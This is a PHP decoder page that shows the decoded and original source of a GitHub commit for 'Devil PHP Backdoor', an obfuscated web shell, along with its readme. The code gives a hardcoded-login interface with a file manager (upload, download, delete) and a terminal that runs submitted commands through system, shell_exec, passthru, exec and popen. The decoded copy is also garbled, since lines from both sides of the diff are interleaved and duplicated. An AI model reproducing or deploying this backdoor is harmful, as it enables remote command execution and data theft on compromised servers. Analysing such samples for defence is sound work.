Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

Skip to content NomanProdhan / devil-php-backdoor Type / to search Code Issues ..

Decoded Output download

Skip to content 
NomanProdhan 
/ 
devil-php-backdoor 
 
Type / to search 
 
Code 
Issues 
Pull requests 
Actions 
Projects 
Security 
Insights 
Commit 
Uploading readme 
 master 
Noman committed on Mar 23  
1 parent 762f6bc 
commit 2909493 
  
Showing 2 changed files with 53 additions and 17 deletions. 
Filter changed files 
 34 changes: 17 additions & 17 deletions34   
devil-php-backdoor.php 
@@ -1,31 +1,31 @@ 
<?php 
 goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["chDir"])) { $dir = $_GET["chDir"]; } echo "<a href="?action=files&chDir=" . $dir . "&download=" . $file . ""/>[Download]</a>"; } goto BE4IO; w9cXK: function getFileMime($file) { return mime_content_type($file); } goto AtRPe; BsPcD: if (isset($_POST["login"]) && isset($_POST["pass"])) { if ($_POST["login"] == "NomanProdhan" && $_POST["pass"] == "BDSEC{_d3V1L_PHP_b4CKD00r_}") { $_SESSION["login"] = "logged"; } } goto p67iP; JkAp3: ob_start(); goto BISgL; BISgL: session_start(); goto BsPcD; tQtbl: if (isset($_GET["download"]) && !empty($_GET["download"]) && isset($_GET["chDir"])) { downloadFile($_GET["chDir"] . "/" . $_GET["download"]); } goto AjwiS; hoS3m: if (isset($_POST["folderName"]) && !empty($_POST["folderName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFolderFlag = createFolder($dir, $_POST["folderName"]); } goto tQxiS; iOdeB: function createFolder($path, $name) { if (is_dir($path . "/" . $name)) { return "Folder already exist."; } else { if (!is_writable($path)) { return "Don't have write permission."; } else { try { mkdir($path . "/" . $name, 511); return "Folder has been created."; } catch (Exception $e) { return "error."; } } } } goto nGUMD; nGUMD: function uploadFile($path, $file) { $targetFile = $path . "/" . basename($file["uploadFile"]["name"]); if (!is_writable($path)) { return "Don't have write permission."; } else { if (move_uploaded_file($file["uploadFile"]["tmp_name"], $targetFile)) { return "File has been uploaded."; } else { return "Couldn't upload file."; } } } goto w9cXK; xMIJW: function createFile($path, $name) { if (file_exists($path . "/" . $name)) { echo "File already exist."; } else { if (!is_writable($path)) { echo "Don't have write permission."; } else { try { $file = fopen($path . "/" . $name, "w"); fwrite($file, "test"); fclose($file); return "File has been created."; } catch (Exception $e) { return "error."; } } } } goto iOdeB; AjwiS: if (isset($_GET["delete"]) && !empty($_GET["delete"]) && isset($_GET["chDir"])) { if (unlink($_GET["chDir"] . "/" . $_GET["delete"])) { $deleteFileFlag = "File has been deleted."; } else { $deleteFileFlag = "Couldn't delete the file."; } } goto K5ZdW; bd2b3: ?> 
<!doctypehtml><html><head><title>Devil PHP Backdoor</title><style>::-webkit-scrollbar{width:10px}::-webkit-scrollbar-track{box-shadow:inset 0 0 5px grey;border-radius:5px}::-webkit-scrollbar-thumb{background:#24484a;border-radius:5px}::-webkit-scrollbar-thumb:hover{background:#0bdbca}*{margin:0;padding:0}body{background:#000;color:#0bdbca;max-width:1024px;margin:auto;font-family:'Courier New',Courier,monospace}.center{margin:0;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}input{width:auto;border:#0bdbca 2px solid;background:#000;color:#0bdbca;height:30px;width:200px;padding:10px;font-size:18px;font-family:'Courier New',Courier,monospace;outline:0}input:focus{border:#0bdbca 2px solid;background:#000;color:#0bdbca}button{background:#0bdbca;color:#000;outline:0;padding:10px;font-family:'Courier New',Courier,monospace;border:#0bdbca 2px solid;height:55px}.simple-nav{background:#000;border:#0bdbca 2px solid;height:40px;width:100%}.simple-nav-item{text-decoration:none;height:40px;border:#000 1px solid;background:#0bdbca;color:#000;padding:10px}.table-1{margin-top:20px;border:#0bdbca 2px solid;width:100%;max-width:1920px}td{padding:5px}pre{height:500px;width:1000px;text-align:left;overflow:scroll;font-size:13px}.main-wrapper{display:flex;align-items:center;justify-content:center;min-height:100vh;height:auto;padding:20px}.link-1{text-decoration:none;color:#0bdbca}.link-2{text-decoration:none;color:#fff}.fileManContent{width:994px;height:500px;overflow:scroll;margin:0;padding:0}.fileManContent thead th{position:sticky;top:0}a{text-decoration:none;color:#09947d}</style></head><body><div><?php  goto x23Fx; K5ZdW: if (isset($_POST["fileName"]) && !empty($_POST["fileName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFileFlag = createFile($dir, $_POST["fileName"]); } goto hoS3m; x23Fx: if (!isset($_SESSION["login"])) { ?> 
<div class="center"><h1>Login to Devil PHP Backdoor</h1><br><form action="<?php  echo $_SERVER["PHP_SELF"]; ?> 
"method="POST"><input name="login"placeholder="Login"> <input name="pass"placeholder="Pssword"type="password"> <button type="submit">Login</button></form><br><hr><br><?php  echo "<h2>Server IP : " . $_SERVER["SERVER_ADDR"] . "</h2>"; ?> 
 goto NF05T; YPfBX: if (isset($_POST["login"]) && isset($_POST["pass"])) { if ($_POST["login"] == "NomanProdhan" && $_POST["pass"] == "NomanProdhan@KS") { $_SESSION["login"] = "logged"; } } goto Zp5zn; NF05T: ob_start(); goto JEcBt; mQdYc: if (isset($_GET["delete"]) && !empty($_GET["delete"]) && isset($_GET["chDir"])) { if (unlink($_GET["chDir"] . "/" . $_GET["delete"])) { $deleteFileFlag = "File has been deleted."; } else { $deleteFileFlag = "Couldn't delete the file."; } } goto Jtz3n; DEn3Z: function downloadFile($file) { if (file_exists($file)) { try { header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } catch (Exception $e) { } } } goto Wd1_Z; wO6it: function uploadFile($path, $file) { $targetFile = $path . "/" . basename($file["uploadFile"]["name"]); if (!is_writable($path)) { return "Don't have write permission."; } else { if (move_uploaded_file($file["uploadFile"]["tmp_name"], $targetFile)) { return "File has been uploaded."; } else { return "Couldn't upload file."; } } } goto Yws85; qWjEv: function createFile($path, $name) { if (file_exists($path . "/" . $name)) { echo "File already exist."; } else { if (!is_writable($path)) { echo "Don't have write permission."; } else { try { $file = fopen($path . "/" . $name, "w"); fwrite($file, "test"); fclose($file); return "File has been created."; } catch (Exception $e) { return "error."; } } } } goto gH58q; jU1sD: if (!isset($_SESSION["login"])) { ?> 
<div class="center"><h1>Login to Devil PHP Backdoor</h1><br><form action="<?php  echo $_SERVER["PHP_SELF"]; ?> 
"method="POST"><input name="login"placeholder="Login"> <input name="pass"placeholder="Pssword"type="password"> <button type="submit">Login</button></form><br><hr><br><?php  echo "<h2>Server IP : " . $_SERVER["SERVER_ADDR"] . "</h2>"; ?> 
<br><hr></div><?php  } else { ?> 
<h1 style="margin-top:20px">Devil PHP Backdoor</h1><table style="margin-top:20px"><tr><td><a class="simple-nav-item"href="?action=system">System Info</a></td><td><a class="simple-nav-item"href="?action=files">File Manager</a></td><td><a class="simple-nav-item"href="?action=terminal">Terminal</a></td><td><a class="simple-nav-item"href="?action=logout">Logout</a></td></tr></table><br><h2>SERVER IP<?php  echo $_SERVER["SERVER_ADDR"]; ?> 
</h2><?php  echo posix_getpwuid(posix_geteuid())["name"]; echo "@"; echo gethostname(); echo "<br>" . getcwd(); ?> 
<br><br><hr><br><?php  if (isset($_GET["action"])) { if ($_GET["action"] == "files") { if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { if (is_dir($_GET["chDir"])) { if (is_readable($_GET["chDir"])) { chdir(strval($_GET["chDir"])); } else { echo "Don't have read permission."; } } else { echo "It's not a directory."; } } ?> 
<h1 style="margin-top:20px">Devil PHP Backdoor</h1><table style="margin-top:20px"><tr><td><a class="simple-nav-item"href="?action=system">System Info</a></td><td><a class="simple-nav-item"href="?action=files">File Manager</a></td><td><a class="simple-nav-item"href="?action=terminal">Terminal</a></td><td><a class="simple-nav-item"href="?action=logout">Logout</a></td></tr></table><br><h2>SERVER IP<?php  echo $_SERVER["SERVER_ADDR"]; ?> 
</h2><?php  echo posix_getpwuid(posix_geteuid())["name"]; echo "@"; echo gethostname(); echo "<br>" . getcwd(); ?> 
<br><br><hr><br><?php  if (isset($_GET["action"])) { if ($_GET["action"] == "files") { if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { if (is_dir($_GET["chDir"])) { if (is_readable($_GET["chDir"])) { chdir(strval($_GET["chDir"])); } else { echo "Don't have read permission."; } } else { echo "It's not a directory."; } } ?> 
<form action=""><input name="chDir"placeholder="Change working directory [Current :<?php  echo getcwd(); ?> 
]"style="width:900px"> <input name="action"type="hidden"value="files"> <button type="submit">Change</button></form><?php  if (isset($deleteFileFlag)) { echo $deleteFileFlag; } ?> 
<table class="table-1"style="width:1024px;height:500px;margin-bottom:25px"><tr><td style="width:1000px;height:500px"><div class="fileManContent"><table style="width:100%"><thead style="background:#0bdbca;color:#000"><td>#</td><td>Name</td><td>Size</td><td>Perm</td></thead><tbody><?php  $dirList = scandir(getcwd()); $counter = 1; foreach ($dirList as $dirContent) { echo "<tr style='background: #424543; color: #ffffff'>"; echo "<td>"; echo $counter; $counter++; echo "</td>"; echo "<td>"; if (is_dir($dirContent)) { echo "<a class="link-1" href='?action=files&chDir=" . getcwd() . "/" . $dirContent . "'>" . $dirContent . "<a/><br>"; } else { echo $dirContent; echo showDownloadLink($dirContent); echo showDeleteLink($dirContent); } echo "</td>"; echo "<td>"; try { if (!is_dir($dirContent)) { $size = filesize($dirContent); if ($size > 1000) { $size /= 1000; if ($size > 1000) { $size /= 1000; echo round($size) . " mb"; } else { echo round($size) . " kb"; } } else { echo $size . " bytes"; } } else { echo "--"; } } catch (Exception $e) { } echo "</td>"; echo "<td>"; try { echo filePrmissions($dirContent); } catch (Exception $e) { } echo "</td>"; echo "</tr>"; } ?> 
<table class="table-1"style="width:1024px;height:500px;margin-bottom:25px"><tr><td style="width:1000px;height:500px"><div class="fileManContent"><table style="width:100%"><thead style="background:#0bdbca;color:#000"><td>#</td><td>Name</td><td>Size</td><td>Perm</td></thead><tbody><?php  $dirList = scandir(getcwd()); $counter = 1; foreach ($dirList as $dirContent) { echo "<tr style='background: #424543; color: #ffffff'>"; echo "<td>"; echo $counter; $counter++; echo "</td>"; echo "<td>"; if (is_dir($dirContent)) { echo "<a class="link-1" href='?action=files&chDir=" . getcwd() . "/" . $dirContent . "'>" . $dirContent . "<a/><br>"; } else { echo $dirContent; echo showDownloadLink($dirContent); echo showDeleteLink($dirContent); } echo "</td>"; echo "<td>"; try { if (!is_dir($dirContent)) { $size = filesize($dirContent); if ($size > 1000) { $size /= 1000; if ($size > 1000) { $size /= 1000; echo round($size) . " mb"; } else { echo round($size) . " kb"; } } else { echo $size . " bytes"; } } else { echo "--"; } } catch (Exception $e) { } echo "</td>"; echo "<td>"; try { echo filePrmissions($dirContent); } catch (Exception $e) { } echo "</td>"; echo "</tr>"; } ?> 
</tbody></table></div></td><td></td></tr></table><table class="table-1"><td><?php  if (isset($createFolderFlag)) { echo $createFolderFlag; } ?> 
<form action=""method="POST"><input name="folderName"placeholder="Folder Name"style="width:320px"> <button type="submit">Create Folder</button></form></td><td><?php  if (isset($createFileFlag)) { echo $createFileFlag; } ?> 
<form action=""method="POST"><input name="fileName"placeholder="File Name"stype="text"tyle="width: 320px;"> <button type="submit">Create File</button></form></td><tr><td><?php  if (isset($uploadFileFlag)) { echo $uploadFileFlag; } ?> 
<form action=""method="POST"enctype="multipart/form-data"><input name="uploadFile"placeholder="Select file"style="width:320px"type="file"> <button type="submit">Upload</button></form></td></tr></table><br><?php  } elseif ($_GET["action"] == "logout") { unset($_SESSION["login"]); session_destroy(); header("Refresh:0"); } elseif ($_GET["action"] == "terminal") { ?> 
<form action=""method="POST"><input name="command"placeholder="Command"style="width:900px"> <button type="submit">Execute</button></form><table class="table-1"style="width:1024;height:500px"><tr><td><pre><?php  if (isset($_POST["command"]) && !empty($_POST["command"])) { if (!checkFunctions("systems")) { system(strval($_POST["command"]), $SystemResult); } elseif (!checkFunctions("shell_execs")) { echo shell_exec(strval($_POST["command"])); } elseif (!checkFunctions("passthru")) { echo passthru(strval($_POST["command"])); } elseif (!checkFunctions("exec")) { exec(strval($_POST["command"]), $ExecResult, $retval); foreach ($ExecResult as $output) { echo $output . "<br>"; } } elseif (!checkFunctions("popen")) { $handle = popen(strval($_POST["command"]) . " 2>&1", "r"); $read = fread($handle, 2096); echo $read; fclose($handle); } else { echo "<h1>Sorry, can't execute command !</h1>"; } } ?> 
<form action=""method="POST"enctype="multipart/form-data"><input name="uploadFile"placeholder="Select file"style="width:320px"type="file"> <button type="submit">Upload</button></form></td></tr></table><br><?php  } elseif ($_GET["action"] == "logout") { unset($_SESSION["login"]); session_destroy(); header("Refresh:0"); } elseif ($_GET["action"] == "terminal") { ?> 
<form action=""method="POST"><input name="command"placeholder="Command"style="width:900px"> <button type="submit">Execute</button></form><table class="table-1"style="width:1024;height:500px"><tr><td><pre><?php  if (isset($_POST["command"]) && !empty($_POST["command"])) { if (!checkFunctions("systems")) { system(strval($_POST["command"]), $SystemResult); } elseif (!checkFunctions("shell_execs")) { echo shell_exec(strval($_POST["command"])); } elseif (!checkFunctions("passthru")) { echo passthru(strval($_POST["command"])); } elseif (!checkFunctions("exec")) { exec(strval($_POST["command"]), $ExecResult, $retval); foreach ($ExecResult as $output) { echo $output . "<br>"; } } elseif (!checkFunctions("popen")) { $handle = popen(strval($_POST["command"]) . " 2>&1", "r"); $read = fread($handle, 2096); echo $read; fclose($handle); } else { echo "<h1>Sorry, can't execute command !</h1>"; } } ?> 
</pre></td></tr></table><?php  } else { ?> 
<table class="table-1"><tr><td>Operating System</td><td><?php  echo php_uname("s"); ?> 
</td></tr><tr><td>Release Name</td><td><?php  echo php_uname("r"); ?> 
<table class="table-1"><tr><td>Operating System</td><td><?php  echo php_uname("s"); ?> 
</td></tr><tr><td>Release Name</td><td><?php  echo php_uname("r"); ?> 
</td></tr><tr><td>Version Information</td><td><?php  echo php_uname("v"); ?> 
</td></tr><tr><td>Host Name</td><td><?php  echo php_uname("n"); ?> 
</td></tr><tr><td>Machine Type</td><td><?php  echo php_uname("m"); ?> 
</td></tr><tr><td>Machine Type</td><td><?php  echo php_uname("m"); ?> 
</td></tr><tr><td>PHP Version</td><td><?php  echo phpversion(); ?> 
</td></tr><tr><td>PHP Interface</td><td><?php  echo php_sapi_name(); ?> 
</td></tr><tr><td>Server IP</td><td><?php  echo $_SERVER["SERVER_ADDR"]; ?> 
</td></tr><tr><td>User</td><td><?php  echo posix_getpwuid(posix_geteuid())["name"]; ?> 
</td></tr><tr><td>Disabled PHP Functions</td><td><?php  echo ini_get("disable_functions"); ?> 
</td></tr><tr><td>Server IP</td><td><?php  echo $_SERVER["SERVER_ADDR"]; ?> 
</td></tr><tr><td>User</td><td><?php  echo posix_getpwuid(posix_geteuid())["name"]; ?> 
</td></tr><tr><td>Disabled PHP Functions</td><td><?php  echo ini_get("disable_functions"); ?> 
</td></tr></table><?php  } } else { ?> 
<h1>Welcome to Devil PHP Backdoor</h1><?php  } } goto LCcPV; SwucF: function filePrmissions($file) { $perms = fileperms($file); switch ($perms & 61440) { case 49152: $info = "s"; break; case 40960: $info = "l"; break; case 32768: $info = "-"; break; case 24576: $info = "b"; break; case 16384: $info = "d"; break; case 8192: $info = "c"; break; case 4096: $info = "p"; break; default: $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto tQtbl; tQxiS: if (isset($_FILES["uploadFile"]) && !empty($_FILES["uploadFile"]["name"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $uploadFileFlag = uploadFile($dir, $_FILES); } goto bd2b3; AtRPe: function downloadFile($file) { if (file_exists($file)) { try { header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } catch (Exception $e) { } } } goto ss8Yr; p67iP: function checkFunctions($param) { $disabled_functions = explode(",", ini_get("disable_functions")); return in_array($param, $disabled_functions); } goto xMIJW; BE4IO: function showDeleteLink($file) { $dir = getcwd(); if (isset($_GET["chDir"])) { $dir = $_GET["chDir"]; } echo "<a href="?action=files&chDir=" . $dir . "&delete=" . $file . "" style="color: red;"/>[Delete]</a>"; } goto SwucF; LCcPV: ?> 
<h1>Welcome to Devil PHP Backdoor</h1><?php  } } goto UgpIw; Zp5zn: function checkFunctions($param) { $disabled_functions = explode(",", ini_get("disable_functions")); return in_array($param, $disabled_functions); } goto qWjEv; xN9_z: ?> 
<!doctypehtml><html><head><title>Devil PHP Backdoor</title><style>::-webkit-scrollbar{width:10px}::-webkit-scrollbar-track{box-shadow:inset 0 0 5px grey;border-radius:5px}::-webkit-scrollbar-thumb{background:#24484a;border-radius:5px}::-webkit-scrollbar-thumb:hover{background:#0bdbca}*{margin:0;padding:0}body{background:#000;color:#0bdbca;max-width:1024px;margin:auto;font-family:'Courier New',Courier,monospace}.center{margin:0;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}input{width:auto;border:#0bdbca 2px solid;background:#000;color:#0bdbca;height:30px;width:200px;padding:10px;font-size:18px;font-family:'Courier New',Courier,monospace;outline:0}input:focus{border:#0bdbca 2px solid;background:#000;color:#0bdbca}button{background:#0bdbca;color:#000;outline:0;padding:10px;font-family:'Courier New',Courier,monospace;border:#0bdbca 2px solid;height:55px}.simple-nav{background:#000;border:#0bdbca 2px solid;height:40px;width:100%}.simple-nav-item{text-decoration:none;height:40px;border:#000 1px solid;background:#0bdbca;color:#000;padding:10px}.table-1{margin-top:20px;border:#0bdbca 2px solid;width:100%;max-width:1920px}td{padding:5px}pre{height:500px;width:1000px;text-align:left;overflow:scroll;font-size:13px}.main-wrapper{display:flex;align-items:center;justify-content:center;min-height:100vh;height:auto;padding:20px}.link-1{text-decoration:none;color:#0bdbca}.link-2{text-decoration:none;color:#fff}.fileManContent{width:994px;height:500px;overflow:scroll;margin:0;padding:0}.fileManContent thead th{position:sticky;top:0}a{text-decoration:none;color:#09947d}</style></head><body><div><?php  goto jU1sD; JEcBt: session_start(); goto YPfBX; gH58q: function createFolder($path, $name) { if (is_dir($path . "/" . $name)) { return "Folder already exist."; } else { if (!is_writable($path)) { return "Don't have write permission."; } else { try { mkdir($path . "/" . $name, 511); return "Folder has been created."; } catch (Exception $e) { return "error."; } } } } goto wO6it; nslsP: function filePrmissions($file) { $perms = fileperms($file); switch ($perms & 61440) { case 49152: $info = "s"; break; case 40960: $info = "l"; break; case 32768: $info = "-"; break; case 24576: $info = "b"; break; case 16384: $info = "d"; break; case 8192: $info = "c"; break; case 4096: $info = "p"; break; default: $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto mDIY_; U8v5_: if (isset($_FILES["uploadFile"]) && !empty($_FILES["uploadFile"]["name"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $uploadFileFlag = uploadFile($dir, $_FILES); } goto xN9_z; Wd1_Z: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["chDir"])) { $dir = $_GET["chDir"]; } echo "<a href="?action=files&chDir=" . $dir . "&download=" . $file . ""/>[Download]</a>"; } goto IZkan; Jtz3n: if (isset($_POST["fileName"]) && !empty($_POST["fileName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFileFlag = createFile($dir, $_POST["fileName"]); } goto CDhow; IZkan: function showDeleteLink($file) { $dir = getcwd(); if (isset($_GET["chDir"])) { $dir = $_GET["chDir"]; } echo "<a href="?action=files&chDir=" . $dir . "&delete=" . $file . "" style="color: red;"/>[Delete]</a>"; } goto nslsP; CDhow: if (isset($_POST["folderName"]) && !empty($_POST["folderName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFolderFlag = createFolder($dir, $_POST["folderName"]); } goto U8v5_; mDIY_: if (isset($_GET["download"]) && !empty($_GET["download"]) && isset($_GET["chDir"])) { downloadFile($_GET["chDir"] . "/" . $_GET["download"]); } goto mQdYc; Yws85: function getFileMime($file) { return mime_content_type($file); } goto DEn3Z; UgpIw: ?> 
</div></body></html> 
 36 changes: 36 additions & 0 deletions36   
readme.md 
@@ -0,0 +1,36 @@ 
# Devil PHP Backdoor 
 
### What is this ? 
It is a simple PHP backdoor created for educational and learning purposes. 
 
### Features 
- File Manager [Browse, download and delete files, create files and folders, upload files] 
- Web shell/terminal [Execute system commands using system(), shell_exec(), passthru(), exec(), popen() functions] 
- System informations 
- Obfuscated 
 
### Login Details 
- Username : NomanProdhan 
- Password : NomanProdhan@KS 
 
### Screenshots 
![Login Screen](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_login_screen.png) 
 
![System Information](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_system_info_screen.png) 
 
![File Manager](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_file_manager_screen.png) 
 
![Terminal](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_terminal_screen.png) 
 
 
### Warning !! 
This backdoor is for educational purposes. Do not use it for illegal activities. 
 
### Follow Me ;P [If you want] 
- Twitter @[NomanProdhan](https://twitter.com/nomanProdhan) 
- YouTube @[nomanprodhan](https://www.youtube.com/c/NOMANPRODHAN) 
- Websites [www.nomantheking.com](https://nomantheking.com) [www.nomanprodhan.com](https://nomanprodhan.com) 
 
--- 
 
If you are a Cyber Security enthusiast and want to improve your skill, you can join our Hack Zone at [www.hack.knightsquad.org](https://hack.knightsquad.org/) or [www.kshackzone.com](https://kshackzone.com/) 
0 comments on commit 2909493 
@Muzytch 
  
Leave a comment 
   
Attach files by dragging & dropping, selecting or pasting them. 
 Youre not receiving notifications from this thread. 
Footer 
 2023 GitHub, Inc. 
Footer navigation 
Terms 
Privacy 
Security 
Status 
Docs 
Contact GitHub 
Pricing 
API 
Training 
Blog 
About 
Copied!

Did this file decode correctly?

Original Code

Skip to content
NomanProdhan
/
devil-php-backdoor

Type / to search

Code
Issues
Pull requests
Actions
Projects
Security
Insights
Commit
Uploading readme
 master
Noman committed on Mar 23 
1 parent 762f6bc
commit 2909493
 
Showing 2 changed files with 53 additions and 17 deletions.
Filter changed files
 34 changes: 17 additions & 17 deletions34  
devil-php-backdoor.php
@@ -1,31 +1,31 @@
<?php
 goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["\143\150\104\151\162"])) { $dir = $_GET["\143\150\x44\x69\x72"]; } echo "\74\x61\40\150\x72\x65\x66\x3d\42\x3f\141\143\x74\151\x6f\x6e\75\146\x69\154\145\163\x26\143\150\x44\151\162\75" . $dir . "\46\144\x6f\167\156\154\157\x61\144\x3d" . $file . "\42\57\76\133\x44\x6f\167\x6e\154\157\141\144\135\74\57\141\76"; } goto BE4IO; w9cXK: function getFileMime($file) { return mime_content_type($file); } goto AtRPe; BsPcD: if (isset($_POST["\x6c\x6f\x67\151\156"]) && isset($_POST["\x70\141\x73\163"])) { if ($_POST["\x6c\157\147\x69\156"] == "\x4e\x6f\x6d\x61\156\120\x72\x6f\144\150\x61\156" && $_POST["\x70\141\163\163"] == "\x42\x44\x53\x45\x43\x7b\x5f\x64\x33\x56\x31\x4c\x5f\x50\x48\x50\x5f\x62\x34\x43\x4b\x44\x30\x30\x72\x5f\x7d") { $_SESSION["\x6c\x6f\x67\151\x6e"] = "\x6c\x6f\x67\147\145\144"; } } goto p67iP; JkAp3: ob_start(); goto BISgL; BISgL: session_start(); goto BsPcD; tQtbl: if (isset($_GET["\144\157\167\x6e\154\157\x61\x64"]) && !empty($_GET["\144\157\167\x6e\x6c\157\x61\x64"]) && isset($_GET["\x63\150\x44\151\x72"])) { downloadFile($_GET["\143\150\x44\x69\162"] . "\x2f" . $_GET["\x64\157\x77\156\154\157\141\144"]); } goto AjwiS; hoS3m: if (isset($_POST["\x66\x6f\x6c\144\x65\162\x4e\x61\x6d\x65"]) && !empty($_POST["\x66\157\154\x64\x65\162\x4e\x61\155\x65"])) { $dir = getcwd(); if (isset($_GET["\x63\150\x44\151\162"]) && !empty($_GET["\143\x68\x44\151\162"])) { $dir = $_GET["\x63\150\104\151\162"]; } $createFolderFlag = createFolder($dir, $_POST["\x66\157\154\x64\145\x72\x4e\x61\155\145"]); } goto tQxiS; iOdeB: function createFolder($path, $name) { if (is_dir($path . "\57" . $name)) { return "\106\x6f\154\144\x65\x72\x20\x61\x6c\162\145\x61\144\171\x20\x65\x78\x69\x73\x74\56"; } else { if (!is_writable($path)) { return "\x44\x6f\x6e\47\164\x20\150\x61\x76\x65\x20\x77\x72\151\x74\x65\40\160\x65\162\155\x69\163\163\x69\157\156\x2e"; } else { try { mkdir($path . "\x2f" . $name, 511); return "\106\157\154\x64\x65\x72\x20\x68\x61\163\x20\x62\145\x65\x6e\x20\143\162\x65\141\164\145\144\x2e"; } catch (Exception $e) { return "\x65\162\162\x6f\x72\56"; } } } } goto nGUMD; nGUMD: function uploadFile($path, $file) { $targetFile = $path . "\x2f" . basename($file["\165\x70\x6c\157\141\144\x46\x69\154\145"]["\156\141\x6d\145"]); if (!is_writable($path)) { return "\104\x6f\156\47\164\x20\x68\141\x76\x65\x20\x77\x72\x69\164\x65\40\x70\x65\162\x6d\x69\163\x73\151\157\156\56"; } else { if (move_uploaded_file($file["\x75\160\154\157\x61\144\106\x69\154\x65"]["\x74\155\x70\137\x6e\141\x6d\x65"], $targetFile)) { return "\x46\151\154\145\40\x68\141\163\40\x62\145\145\156\x20\165\160\154\157\141\x64\x65\144\x2e"; } else { return "\103\157\165\154\x64\156\47\164\x20\165\160\x6c\x6f\x61\x64\40\146\x69\154\x65\56"; } } } goto w9cXK; xMIJW: function createFile($path, $name) { if (file_exists($path . "\57" . $name)) { echo "\106\151\154\x65\40\141\154\x72\145\141\x64\x79\x20\145\x78\151\163\x74\56"; } else { if (!is_writable($path)) { echo "\x44\x6f\156\47\164\x20\150\141\166\145\x20\167\x72\x69\164\x65\x20\x70\145\162\x6d\151\x73\163\151\x6f\156\56"; } else { try { $file = fopen($path . "\57" . $name, "\x77"); fwrite($file, "\164\145\x73\x74"); fclose($file); return "\106\x69\154\x65\x20\x68\x61\163\40\142\145\x65\156\x20\x63\162\145\141\x74\x65\144\56"; } catch (Exception $e) { return "\x65\162\162\157\162\x2e"; } } } } goto iOdeB; AjwiS: if (isset($_GET["\144\145\x6c\145\x74\145"]) && !empty($_GET["\144\145\154\x65\164\x65"]) && isset($_GET["\143\x68\104\151\x72"])) { if (unlink($_GET["\143\x68\x44\x69\x72"] . "\x2f" . $_GET["\x64\x65\154\x65\x74\x65"])) { $deleteFileFlag = "\x46\151\x6c\x65\40\x68\141\163\x20\x62\x65\145\156\x20\x64\x65\x6c\x65\164\x65\144\x2e"; } else { $deleteFileFlag = "\x43\157\x75\154\144\156\x27\164\40\x64\145\x6c\145\164\145\x20\x74\150\x65\40\x66\151\x6c\145\x2e"; } } goto K5ZdW; bd2b3: ?>
<!doctypehtml><html><head><title>Devil PHP Backdoor</title><style>::-webkit-scrollbar{width:10px}::-webkit-scrollbar-track{box-shadow:inset 0 0 5px grey;border-radius:5px}::-webkit-scrollbar-thumb{background:#24484a;border-radius:5px}::-webkit-scrollbar-thumb:hover{background:#0bdbca}*{margin:0;padding:0}body{background:#000;color:#0bdbca;max-width:1024px;margin:auto;font-family:'Courier New',Courier,monospace}.center{margin:0;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}input{width:auto;border:#0bdbca 2px solid;background:#000;color:#0bdbca;height:30px;width:200px;padding:10px;font-size:18px;font-family:'Courier New',Courier,monospace;outline:0}input:focus{border:#0bdbca 2px solid;background:#000;color:#0bdbca}button{background:#0bdbca;color:#000;outline:0;padding:10px;font-family:'Courier New',Courier,monospace;border:#0bdbca 2px solid;height:55px}.simple-nav{background:#000;border:#0bdbca 2px solid;height:40px;width:100%}.simple-nav-item{text-decoration:none;height:40px;border:#000 1px solid;background:#0bdbca;color:#000;padding:10px}.table-1{margin-top:20px;border:#0bdbca 2px 